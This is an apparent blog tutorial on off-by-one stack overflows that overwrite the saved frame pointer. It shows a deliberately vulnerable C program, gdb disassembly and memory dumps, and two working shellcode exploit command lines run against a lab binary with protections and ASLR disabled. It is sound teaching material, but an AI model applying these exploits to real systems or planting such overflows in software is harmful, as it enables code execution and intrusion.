x86 Exploitation 101: “Off-by-one” and an uninvited friend joins the party

After this deep trip into the heap overflow techniques (although there’s still much to see), it’s time to analyze again a particular stack overflow scenario: the so-called “off-by-one” scenario. What happens if the buffer we’re writing into can be overflowed by only one single byte? One of the first talk (if not the really first one) about this kind of scenario is in the Bugtraq mailing list: Olaf Kirch posted a message describing this vulnerability that he called “The poisoned NUL byte”. I will quote the core of his post:

At the beginning of the function, realpath copies the argument (1024 bytes) to a local buffer (sized MAXPATHLEN, i.e. 1024 bytes). Thus, the terminating 0 byte of the string gets scribbled over the next byte, which happens to be
the lowest byte of %ebp, the frame pointer of the calling function. At function entry, its value was 0xbffff3ec. After the strcpy, it becomes 0xbffff300.

During the remainder of realpath(), nothing exciting happens, but when the function returns, %ebp is restored from stack, which effectively shifts down the calling function’s stack frame by 0xec bytes.

The whole vulnerability consisted into copy a string of X bytes into a buffer of exactly X bytes (and not X + 1). When writing the code somebody forgot that strcpy always adds to the destination buffer an additional NUL byte telling where the string ends. Of course, if the destination buffer’s size exactly matches the length of the string, the NUL byte will be written outside the buffer itself, overwriting potentially important data. Of course, if the buffer is close to the pushed EBP value, the latter’s LSB will be overwritten with a NUL byte.

Slightly more than a year later, a deeper analysis of the problem appeared on Phrack #55 in the article “The Frame Pointer overwrite” by klog. The vulnerable code he proposed is the following one (he ironically called it “suid“):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void func(char *sm)
{
  char buffer[256];
  memcpy(buffer, sm, 257);
}

int main(int argc, char *argv[])
{
  if (argc < 2) {
    printf("missing args\n");
    exit(-1);
  }

  func(argv[1]);

  return 0;
}

With a simple compilation

gcc -g -m32 -fno-stack-protector -z execstack -o suid suid.c

and a quick look to the dissassembled executable we can easily check out the situation:

$ gdb -q suid
Reading symbols from suid...done.
(gdb) disass func
Dump of assembler code for function func:
   0x08048525 <+0>:     push   ebp
   0x08048526 <+1>:     mov    ebp,esp
   0x08048528 <+3>:     sub    esp,0x118
   0x0804852e <+9>:     mov    DWORD PTR [esp+0x8],0x101
   0x08048536 <+17>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048539 <+20>:    mov    DWORD PTR [esp+0x4],eax
   0x0804853d <+24>:    lea    eax,[ebp-0x108]
   0x08048543 <+30>:    mov    DWORD PTR [esp],eax
   0x08048546 <+33>:    call   0x80483f0 <memcpy@plt>
   0x0804854b <+38>:    leave
   0x0804854c <+39>:    ret
End of assembler dump.
(gdb)

The LEA instruction at 0x0804853D is somewhat suspicious: why letting buffer start at 0x108 bytes before the pushed EBP if buffer is actually 0x100 bytes long? Having this additional space would kill our goal! Well, the answer is, again, that GCC uses the 16-byte alignment for the stack and this is fixable by adding the -mpreferred-stack-boundary=2 parameter to the GCC’s command line:

gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o suid suid.c

$ gdb -q suid
Reading symbols from suid...done.
(gdb) disass main
Dump of assembler code for function main:
   0x0804854d <+0>:     push   ebp
   0x0804854e <+1>:     mov    ebp,esp
   0x08048550 <+3>:     sub    esp,0x4
   0x08048553 <+6>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048557 <+10>:    jg     0x8048571 <main+36>
   0x08048559 <+12>:    mov    DWORD PTR [esp],0x8048620
   0x08048560 <+19>:    call   0x8048400 <puts@plt>
   0x08048565 <+24>:    mov    DWORD PTR [esp],0xffffffff
   0x0804856c <+31>:    call   0x8048410 <exit@plt>
   0x08048571 <+36>:    mov    eax,DWORD PTR [ebp+0xc]
   0x08048574 <+39>:    add    eax,0x4
   0x08048577 <+42>:    mov    eax,DWORD PTR [eax]
   0x08048579 <+44>:    mov    DWORD PTR [esp],eax
   0x0804857c <+47>:    call   0x8048525 
   0x08048581 <+52>:    mov    eax,0x0
   0x08048586 <+57>:    leave
   0x08048587 <+58>:    ret
End of assembler dump.
(gdb) disass func
Dump of assembler code for function func:
   0x08048525 <+0>:     push   ebp
   0x08048526 <+1>:     mov    ebp,esp
   0x08048528 <+3>:     sub    esp,0x118
   0x0804852e <+9>:     mov    DWORD PTR [esp+0x8],0x101
   0x08048536 <+17>:    mov    eax,DWORD PTR [ebp+0x8]
   0x08048539 <+20>:    mov    DWORD PTR [esp+0x4],eax
   0x0804853d <+24>:    lea    eax,[ebp-0x100]
   0x08048543 <+30>:    mov    DWORD PTR [esp],eax
   0x08048546 <+33>:    call   0x80483f0 <memcpy@plt>
   0x0804854b <+38>:    leave
   0x0804854c <+39>:    ret
End of assembler dump.
(gdb)

Definitely better. So, the first instruction describes the layout that the stack is going to adopt:

STACK:   ^
         |
         |      pushed EIP
         |      pushed EBP
         |      buffer[255]
         |      buffer[254]
         |      ...
         |      buffer[0]
         |

So, as expected, the exceeding byte will overwrite the LSB of the EBP pushed value. What are the consequences of this? How can an EBP, changed from 0x11223344 to 0x112233XX, be exploited? In order to understand this, a little bit of study is required. Right before func returns, at 0x0804854B, the pushed (and changed) value of EBP is restored into the register and the function returns; the real deal comes when main returns as well, as the LEAVE instruction at 0x08048586 will copy EBP to ESP and pop EBP from the stack. At the end of the execution of this instruction, ESP will be set to 0x112233XX + 4 (because of the popping).

This whole thing is easily verifiable:

$ gdb -q suid
Reading symbols from suid...done.
(gdb) b *0x08048587
Breakpoint 1 at 0x8048587
(gdb) b *0x0804854C
Breakpoint 2 at 0x804854c
(gdb) r `python -c 'import sys; sys.stdout.write("A" * 257)'`

Breakpoint 2, 0x0804854c in func ()
(gdb) i r ebp
ebp            0xffffcd41       0xffffcd41
(gdb) c
Continuing.

Breakpoint 1, 0x08048587 in main ()
(gdb) i r esp
esp            0xffffcd45       0xffffcd45

ESP got “damaged” and, right before returning from main, is set to 0xFFFFCD45. Even if we’re not able to overwrite the return address, as it’s possible to set ESP to a partially arbitrary value, then we can fool the CPU around and making it believe that the return address is somewhere else, inside our buffer variable.

The next step is to make it pointing to the right position in buffer and to fill the latter with a valid shellcode. This is how buffer‘s layout will look like:

NOPs
Shellcode
New return address
Overflowing byte

So, for the first two elements, there’s not much about to say… Just a bunch of NOP instructions and the usual shellcode will fit. The new return address will match, of course, buffer‘s address (in my case 0xFFFFCD1C); about the overflowing byte, it must computed in order to let the CPU think that the returning address is the one we set into buffer. On my computer, right after the memcpy, buffer looks like this:

(gdb) x/65x 0xFFFFCD1C
0xffffcd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcddc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdec:     0x90909090      0x90909090      0xc03117eb      0xc931db31
0xffffcdfc:	0x04b0d231      0xb25901b3      0xb080cd06      0xcddb3101
0xffffce0c:	0xffe4e880      0x7750ffff      0x2164656e      0xffffcd1c
0xffffce1c:     0xffffceXX

EBP       -> 0xFFFFCE1C

In order to have the CPU tricked in the proper way, in 0xFFFFCE1C we must be set to 0xFFFFCE14: this means that 0x14 is the overflowing byte.
Well, everything’s ready. Let’s try this one out:

$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (252-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x14")'`
Pwned!$

Yah-wee!!!! It works!

But it’s not over yet. What if we’re not able to control the overflowing byte? What if, instead of memcpy, we had a wrongly-used strcpy (which is more similar to Kirch’s scenario)?
So, the code changes in the following way:

void func(char *sm)
{
  char buffer[256];
  if(strlen(sm) <= 256)
    strcpy(buffer, sm);
}

strcpy will copy sm into buffer, but will add a NUL character outside the boundaries. So, our overflowing byte will be 0x00, without any chance of modifying it. Not a big deal: we just need to rearrange the content of buffer.
We know that stored EBP value will be corrupted to be 0xFFFFCE00 (because of the NUL character): this means that the returning address must be stored 4 bytes away from there, at 0xFFFFCE04. buffer will look like this:

NOPs
Shellcode
NOPs
New return address
NOPs

(gdb) x/65x 0xFFFFCD1C
0xffffcd1c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd2c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd3c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd4c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd5c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd6c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd7c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd8c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcd9c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdac:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdbc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcdcc:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffcddc:     0x90909090      0xc03117eb      0xc931db31      0x04b0d231
0xffffcdec:     0xb25901b3      0xb080cd06      0xcddb3101      0xffe4e880
0xffffcdfc:     0x7750ffff      0x2164656e      0xffffcd1c      0x90909090
0xffffce0c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffce1c:     0xffffce00

(NOPs… NOPs everywhere)
Running this one will work:

$ ./suid `python -c 'import sys; sys.stdout.write("\x90" * (232-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21" + "\x1c\xcd\xff\xff" + "\x90" * 20)'`
Pwned!$

During the whole testing, I had, again, to disable the ASLR system. In conclusion, even a one-byte overflow is enough to change the original behaviour of an application and to subvert it to our will. There’s never peace for these guys…

Advertisement

One thought on “x86 Exploitation 101: “Off-by-one” and an uninvited friend joins the party

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s